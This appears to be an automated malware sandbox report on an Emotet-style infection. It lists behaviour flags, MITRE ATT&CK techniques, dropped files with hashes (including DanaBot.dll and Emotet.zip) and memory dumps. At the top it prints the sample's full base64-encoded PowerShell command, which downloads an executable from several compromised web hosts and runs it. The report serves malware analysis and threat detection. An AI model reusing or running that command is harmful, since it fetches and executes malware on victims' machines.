powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5416 -ip 5416
1⤵
PID:5512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\284.exe

Filesize
149KB

MD5
dfb2b4e47b6589b121f13d056208f992

SHA1
f6480ba7e7763615e1fa0b3d8289f22df55d82ec

SHA256
9a3dac72ba3b6afc88e307bd9bae52ae2016bf292ead636ec7b34923e27c8ae5

SHA512
c0b41c9d9bf7c42de17d1784de7b996db8597418cbe42417f706fbd09df3e7d057899cea2d0f737ce74447b04dd76ed70b2aa5d02491168595f64bfeb2393e08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f9664c896e19205022c094d725f820b6

SHA1
f8f1baf648df755ba64b412d512446baf88c0184

SHA256
7121d84202a850791c2320385eb59eda4d697310dc51b1fcd4d51264aba2434e

SHA512
3fa5d2c68a9e70e4a25eaac2095171d87c741eec2624c314c6a56f4fa390d6319633bf4c48b1a4af7e9a0451f346beced9693da88cfc7bcba8dfe209cbd1b3ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
847d47008dbea51cb1732d54861ba9c9

SHA1
f2099242027dccb88d6f05760b57f7c89d926c0d

SHA256
10292fa05d896a2952c1d602a72d761d34bc776b44d6a7df87e49b5b613a8ac1

SHA512
bd1526aa1cc1c016d95dfcc53a78b45b09dde4ce67357fc275ab835dbe1bb5b053ca386239f50cde95ad243a9c1bbb12f7505818577589beecc6084f7b94e83f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
67KB

MD5
1d9097f6fd8365c7ed19f621246587eb

SHA1
937676f80fd908adc63adb3deb7d0bf4b64ad30e

SHA256
a9dc0d556e1592de2aeef8eed47d099481cfb7f37ea3bf1736df764704f39ddf

SHA512
251bf8a2baf71cde89873b26ee77fe89586daf2a2a913bd8383b1b4eca391fdd28aea6396de3fdff029c6d188bf9bb5f169954e5445da2933664e70acd79f4e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
41KB

MD5
ed3c7f5755bf251bd20441f4dc65f5bf

SHA1
3919a57831d103837e0cc158182ac10b903942c5

SHA256
55cbb893756192704a23a400bf8f874e29c0feee435f8831af9cbe975d0ef85d

SHA512
c79460ded439678b6ebf2def675cbc5f15068b9ea4b19263439c3cca4fa1083dc278149cde85f551cd2ffc2c77fd1dc193200c683fc1c3cdac254e533df84f06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
63KB

MD5
710d7637cc7e21b62fd3efe6aba1fd27

SHA1
8645d6b137064c7b38e10c736724e17787db6cf3

SHA256
c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

SHA512
19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
1.2MB

MD5
027a77a637cb439865b2008d68867e99

SHA1
ba448ff5be0d69dbe0889237693371f4f0a2425e

SHA256
6f0e8c5ae26abbae3efc6ca213cacaaebd19bf2c7ed88495289a8f40428803dd

SHA512
66f8fbdd68de925148228fe1368d78aa8efa5695a2b4f70ab21a0a4eb2e6e9f0f54ed57708bd9200c2bbe431b9d09e5ca08c3f29a4347aeb65b090790652b5c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
27KB

MD5
903acff81aec95fb624ad47960f14af1

SHA1
de8d7f3ae08621987d76e176118e1da6a7c2475f

SHA256
05d439f7aa4807ebfe90919429e6c6d352ea3816ce6a9592f4df42c2b22871d8

SHA512
c25bcf91200f1ddd174f17f2f95e3292cc8702884c3c0d79803a55effbddf66f43b7c243644c12e788cc1367d2f335ca67e07ec0053b066820719301693db767

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

Filesize
17KB

MD5
9e2576a6ebb1f8746620c962e678876b

SHA1
be7435ce980295ab05f0bf35afb91081d6205648

SHA256
7aed84b3995766e032b4ce64189b305b13eff8f525bc0e46d326e9782c04b567

SHA512
130a87dc78913a4811af0f67e902bf907cd32c70637f5e1c1f08321bb7f3d0ba714ab68b68dc771924e914fa95d556573d6b92fb52071fc64debe4145951238e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0bbe00d9bf7b798e_0

Filesize
2KB

MD5
b0b56d114abf52877d2a10f8ac63a2e8

SHA1
9abd758f50145ee8ba9287b7614c33abc8e6c3d1

SHA256
f7c4fd1768696da039e1f7f1bc91275631f32de56986aba158787bf97aebedf6

SHA512
2bbd6e51b99003b3bdceff3b4661fc8af961a16e10b709d61a3553fd75e092112441670fff1ea0917016ab2f9944de5747041c3dd86bae0c29cba9f3f9dc4f78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3f02c4494b1a18ff_0

Filesize
2KB

MD5
86ec1bf3f7dff9548a56c22c5b76c90e

SHA1
5383289284f26e63c3c97962baf6c7b1cc2261bb

SHA256
c7fe3e7d71956695e81bd24e48015d4c171455e6b4f59fae19685725113965bc

SHA512
3ff0ed19e4ea5f099a31a40e9ccdc69da1fe9c6449e13ff7dc451e6c3b4879a06ba1d913992f1586ce41d0c9830b11b50885fd760f6e9315fa7afee53ebf5eab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5a994fe24b451732_0

Filesize
4KB

MD5
e141d93ec2e2134f87bddf137449016b

SHA1
d59b840f3622464c1346f4764a0e59ee128c11fe

SHA256
0087b6241a1eb920bd94403336068545bcc809aeacdb6c4f3a8dbcc096f1b2a1

SHA512
9c0fe23c75285218a66002b30643afaa67281f5154ef43d9fd031a7651b36e9f9ce44f2f143e245b0bd3bdbca075a0e10bf779f1a4c89640142535906bfce0a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5b2f11f3f15a5775_0

Filesize
3KB

MD5
9a880ea439035353096ca91a088bcd8a

SHA1
67479f4caced02cc2c166715cb78c939317e9c10

SHA256
7c9e740c9631c45d3099e06406b22d1c860c5db8eef330f3e5f6aa52f42fc521

SHA512
b9631343257628ea1f37a8639073aea5c42bf70af6289d56c929bf73f197f79b87275cded13d41f10b3d1d42a5e2e67a8736ead5483b36757b4cf8f34ee14a8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9412c8b664751f90_0

Filesize
1KB

MD5
f36e17b23b1893b153dc2205440712a8

SHA1
1dd264f4a2dde04e16d233bccb56715136a196a9

SHA256
a23ddb24db2eb4a045183b54c39f7fb4061537932b918a4b1c6cb0e0d9c8a112

SHA512
0feec5c363c33ff79c74abc133bf2f28d8d7d944e10953bc0cef5d6ffbad8aa866fbc82e471fe6f43892c6de007c4ade71a2e5ca5fbff596ed9a54a3374beb39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b1d7d09e2437e8ee_0

Filesize
5KB

MD5
6101b95985def01ab9ba8212b763811f

SHA1
06ecb038c76bfa95cba8766cc86fbe3c8b13d6fd

SHA256
76346a5da7a359b31109c5e2e959671056e07b229464f406c1b60ff735e3e89f

SHA512
96a34e827c6571a1b8e264cfa4986e6c00e9412b964b6c26562664f8e09c5b3e2c96d2d6a2e959b0d0f3d12ada6b6c62cfb138521c1ff2c51482d6d597a997e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cbd83c2e90693c9c_0

Filesize
2KB

MD5
f7df41eaf311f2f2ce490d5aff8bd70f

SHA1
6a0cf0e38b66a5b297f3e0ce2c33adae0113519b

SHA256
9668dee4cc17b15ec92fd0099ad831360b8929e5450f01dfba5f9f08505fef0a

SHA512
442dc48b5e8e901e624a34d8461b472607c80ab8b302880e8d227e9b9441c6ed7bcefe810f7503238c187643869cdac1d1dc94ae4f705ff253e2a5b815d961b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f2e4bbad99a372cc_0

Filesize
2KB

MD5
e9c2f83cf910adff123e9a488d1917c7

SHA1
afc97b60328854d4f8bf7249d2eef0e4fefb9fea

SHA256
68ab438c05f2c544a0b2d0b01347a148bcd75b57de1df8aaf720ba8e822a3a4a

SHA512
9fd9a63580b679da5656f9a5da4b0618aef56791c1cd7ec25892838bf053c938e7b2108b88bd279ec89e82f6b86fabd667a209c771e9b05b8a45ce89d5a89bba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
fe6abfa979e39fb830fac9c01b389425

SHA1
2a1bf8b2518526ea9629cb117e78c9ceb350a800

SHA256
3608576ef1a96240c366e8c80bfac713fcd3b28d3eefc53aeba8498e53411b4f

SHA512
d9ca53e8a9f1dc2ac135f452fef6acdd4e0e32a0ece9f94e855cbe392190c9e3cbaf9ec652797aeeabdb6ef5461f1ef1ef1a33ccf4c6ebed04b6b368d9056cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
cc620bd5e61f1c58f120c88bb9bbf6dd

SHA1
ed0066f3e6b9a0c00eb28047be48adb1a85b0077

SHA256
b03314f237fe7a8157e46ae3241555edbef7a4288d4f67788a02caf569d82da3

SHA512
fd6d4881728eb7248b335bc05ee07519ddfb093bb41df46f77fa5285e5e8a4ba4488bc0ae748e4edca95d380e1c58d6278db37c088a9e1acd59890b8c19b7869

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
760B

MD5
d37a3242afadea533e4ff0ea30a5ddca

SHA1
6bd790fa04b0ae6b6e6807449ce67c864ca49256

SHA256
a4cdf02994d40f4f8bfbbebba8039d18ba77f1a397bc14d49b407d0ddde6ee02

SHA512
9cd358d84f4968c4bab1184c38b4351713039a07322844a50cba5b2982562fc657620a4cf188929913d055d0eb5df3e5556f6d2cffae096d180b4c595867f827

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
7dfd6f8f129277e835c75b6ae5e5a1e4

SHA1
065cfc6f469f387039e77381a3720a097cef0105

SHA256
384eca79e5a27ef2572b334179a22f48a854ea83c345e93c588e054fb8ec0baa

SHA512
8364ba6e52b9315945d65d4cb81bdc5643d786c0c0e2fe6028f023659aff9253e45cc28db9d0c8cfbc4078e3e5de475724f00c5e62492b319d522267cfebbd3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ab9bd7efd4538f6f900afc33d4f0ec1c

SHA1
650f56fcac1186c697f9efa7fdd8ad034af1cc1b

SHA256
4cba174d293f823a472754760b02a4e89426dfce044fa3a801e6dafc920302e4

SHA512
96e6b3077ea11f283b4aa1aeff9b83ea84283fb47aeef0a31553f908e9d838bf4c31e354c72acee063524c6507cf81f6aadb30718519230e6dd9cdd2cfc0c155

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
2f139158d8ce1e5baee47475de3143cc

SHA1
dd7b6fb66b48fa573607db9c41cd70a8a403e69b

SHA256
cd71dbf5d709984cd5849f38fc6c80a2be3724cd91d466a14f2ce9c0de6973d8

SHA512
31ec67878c58c6efc430fcc10120a175d942067c684a4dc744db26a954f89136c814a63aa5f684f17d41f38f6095464072912f86980c8ad93f511b18095208dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
0de4a3e54d1978b8a85a1fa47e8dce11

SHA1
81971d8fff7d376c3fe0324366c489f44855845d

SHA256
d8cb6176408176907b282165474011469a6ba2929a56c3b85cb9f198e98eb62c

SHA512
97093d85810fd52acf7fcb08b3eb230ac18b3534a5fe312e48c24fcdea420bf69fedd4b6370244bef8315f248e63232e25989017e538882dd663312730b2e4fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0d86d524065f59358a99488587fbcafa

SHA1
d04c118792388bdf634c583c03e27ff6e29d63ae

SHA256
2e8b068ca1dbd12d33e520aeed52a2f57464bc87e9e20c4bbfe359b0f91be3b3

SHA512
5f60f03ad7388a21f0d358c3e1131460ae8606b7abcf600c779406f5a4441ea13719565461b018bd92fd2da3f452be4bf4b3fa778181164d13221bea6de99678

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b00afc29c39810cac925adcf6f5ab914

SHA1
5a82cb9194937b9ca257cb7fceb7956a4120864e

SHA256
e0070eef7899d60765661c7e644470f93268ac6a3bff5b9d6be03129f5dc551f

SHA512
c65fb8680e59e5d4b6523a439630f3092ced547b2de492947e7970f9484529f616734eef4e1d3b78698e49038901503bf830e22c6093c272ca3aa15bbef99985

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
0baad6bc4c116190e3d1cf051de01a40

SHA1
239c578d8c283147998d57672efc915ec5cb903b

SHA256
5d4a10c83fe3d57b94a8d4bb073ccf6fc4ddbdcf85cada85fd7f8fefb267e116

SHA512
c76ff372f23f3bfc13085869ca2fa946fc55ce9163e1f9b1d21d0652fa213db9cc398d8754b930102c82cc7ccab0ec809a5e5857802285bfe912650e342e98a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
148df52322c07eaa4ec815fcc9bd21e3

SHA1
efe41fc1343f9f070dad30f04f0acb446ec9e740

SHA256
d21665c31b01994c291db8b691afd79cd7e615c68127755ab263df13ec059225

SHA512
4214fed70be13a1091f76e554e7df31927d16d2c36a88c7b182fee8ff02194cca92b519cd6029611c9636a3cd9f9f3ce9d9ebf3ea2c4b3927fe2559c32401f6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b0d56c2fc80a2644cfcfa6ca7e6adb8c

SHA1
38ce1faa722f3f8ffb6cc800a134083fcac0f4a4

SHA256
a0f7f5342249cee65cc50a77681800f3222bbfbd7ae9d3ec0e865e977e706c7a

SHA512
98afe88d6fa1ffcd84cbae81b6d2d44b4cc65456eadbfe4efb3de0fb0fad89ed82f3ad0ab908553ae3c17f79c7f6482a1f9b1cb777fecbba34e2adfa5ac39c58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
3956290926052c3bd8e96bcaafe7df94

SHA1
f25259fd19cf54a171a5f655c04834bcd1b8744c

SHA256
0256a861da88937cdd61c65a4d91f7886cd516f8947d2f591451704168e22497

SHA512
f0266722af6bccec4588b35f45adb29e8afb6e4dc1e581483a93ef3d8f7e6ab65e18e7f822fd29b0a093d8e2054e3169360ff1c10ee43830122ed1870aefb029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
cd5f2fc46c139f840b3b5b7aec2505ec

SHA1
ee668d2d21d7955cc05d9b5f443810f40d21957b

SHA256
d16d3908e0e98721e35440f0d858e50e97bd27b67b088c43fa09b5baa00c7cef

SHA512
d6e68afe8d46c1b064719c36d5ad4c89e4d7285f332a2786671d0ad006372dd7edb799826ca8a1eaf38010eabf8eb36d44e26140264f13e204e47ac4c0696c26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2fa2bc8af7daa4ff5bfa24ee0b0f1d1b

SHA1
4b2de2a634f5cbb2869c8841c543b99fee6e764c

SHA256
168897c5f08b155b250d1fe2d38bd3eb644ac2dee034e705472bbea8ad08f5a8

SHA512
3386b76f5fc3992433153dadc54e01036ba1b68ecb17483494107c6ec1fc9b62f344574ce508fea94876d316d01e2e5076e6448b7a69ce7ae1815aa22b793d22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe589cb8.TMP

Filesize
538B

MD5
72ff23099383f8aeed5d7d0a3e84d438

SHA1
d30617733c7582ee9abc3d0bb9bdfcdfc8142392

SHA256
a04f90b17af2ec057d1daaf6e385605851f040bf8bc0b34832ba6c363febf808

SHA512
9ae5671947d2cc16f3d525f08ae9d07b892d8fba68a15320ff6d65e0348b94618b67ddeb1f019b274879f2fdc813d28c10ca41d8eeac2bd7adc521a1686cdf1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f81f869a-901b-4a46-a0c5-f5036f06d172.tmp

Filesize
6KB

MD5
d32c5d0c76ed663c49de63e3b23f3173

SHA1
b29fcbf97a972941fa77ae7196843cc42fb49be0

SHA256
7803f9c8c4eea6465db3e522b0f7dcbb6631ee3fb49a5543e0dc97e5c27cee4a

SHA512
65ce386c93889f94bbdc4b32701ba232fa37b07f4c7b8df7dfd073f32fdf3228e3f59d71289e94f8713ea3b65f1c48775a02b36519595b801e1dc708d77487b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a9221f6314f12e349e12cca5ce127fe5

SHA1
886210eb9b6acd8757f854cb1967220c7a5eef9a

SHA256
9b4207f36a3dbe05afc1d8c63ab13de159de2a6d1ba2ad25dbbbacf319a53a5d

SHA512
46ff4256e720193e5f758e1eabfc920ac66c58d3a5f24f19de90a7718f1bcacddccb8da89a7c9acfd3451d7e7f804b65aeb0dba3d0659f0a9a2c671526a541fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d64a4dee1829c8a7ba09e4318ea2a515

SHA1
77febc8dfcb33def23eb34855b8f735ab07822a3

SHA256
4ecd91b1dc4318ad62ac72a903758a52730d7ba250769c6b2864093b58c6bccc

SHA512
1b77a9d6913f5cfaa3f7d0bd6f91a0f71cbeb1dbfefb0f48866929d110e37bc23b908f3a73e7508ad709ef84cb5d31a59a4a388961f7c1e6ee296172c656cbca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
55b7fffde98dce94d1afc7b18fc6c411

SHA1
75a53fc3cbe5cba680c5f58e1dd7883cf0749b63

SHA256
026d638288da11cd4ea4320fcd93ab631cac9cd8a184a00ce5b0193048626341

SHA512
02a7aae208e133b58e546048df76bf326ff8caaf46df52011f8fe60962909c74c52b2cb6c42cf96ebb4872fce13bf9235f3ef4d839a6239ce49b282998e8ec80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
7c5ce4754710f031b135b723f6385cef

SHA1
edc14fb9fb674942e3bc7a690c9aa6bb2fc3ca96

SHA256
52f4fda4072ff73d664a77f10888b4eae29e84b851ade57b220b4b3ccccd0f1a

SHA512
471757045df1ed09220d5023d37e33502327afd651150d078badae6b796cc0434468f726da0e9097e134f340cf5c04f049f4518e3ac7d58a2acc789accacb351

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\905D0C48.wmf

Filesize
430B

MD5
42af375c84a398eaa5524c23ec81cc93

SHA1
c12b6a539e9a4bce26665fedb56685647cb87e5a

SHA256
c82f9a2603ef113b3ecdab72f061bdec4c0cea40001566eeb49fdd1a1f92b9ec

SHA512
d6af63dcf711dc9a08fa9a1f5ad868323970c555537d6523ce6bb9c2fe8ca21a4dd19df767f81ad24055d4cae20a386ef5147e118b7d9b1efd5d60074daa0edf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CEC9EEAA.wmf

Filesize
430B

MD5
8ecf944bda26c07a102d63f572d0007a

SHA1
441ea3425f483433ac8e7bf7bae15145d0d56e0d

SHA256
8627daa7658af814733d854d7920c987bdd4028090a00dd3a16cb8c9b856d816

SHA512
be9c94ba740d4b5b0b7de7c6ac4ac8a76f571e928275b7738a0e42c9560283751027761ca02f8181f87e9fb7fcff0348384815dfd351f7dc357b1169b4fcbefd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3zu0pq3.aag.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\DOWNLO~1\DanaBot.dll

Filesize
2.4MB

MD5
7e76f7a5c55a5bc5f5e2d7a9e886782b

SHA1
fc500153dba682e53776bef53123086f00c0e041

SHA256
abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3

SHA512
0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24

Download Submit
C:\Users\Admin\Downloads\Emotet.zip

Filesize
102KB

MD5
510f114800418d6b7bc60eebd1631730

SHA1
acb5bc4b83a7d383c161917d2de137fd6358aabd

SHA256
f62125428644746f081ca587ffa9449513dd786d793e83003c1f9607ca741c89

SHA512
6fe51c58a110599ea5d7f92b4b17bc2746876b4b5b504e73d339776f9dfa1c9154338d6793e8bf75b18f31eb677afd3e0c1bd33e40ac58e8520acbb39245af1a

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 151358.crdownload

Filesize
2.7MB

MD5
48d8f7bbb500af66baa765279ce58045

SHA1
2cdb5fdeee4e9c7bd2e5f744150521963487eb71

SHA256
db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1

SHA512
aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

Download Submit
memory/1716-1058-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
memory/1716-1061-0x00007FF9F0AA0000-0x00007FF9F0AB0000-memory.dmp

Filesize
64KB

Download
memory/1716-1372-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
memory/1716-1371-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
memory/1716-1370-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
memory/1716-1373-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
memory/1716-1062-0x00007FF9F0AA0000-0x00007FF9F0AB0000-memory.dmp

Filesize
64KB

Download
memory/1716-1056-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
memory/1716-1060-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
memory/1716-1057-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
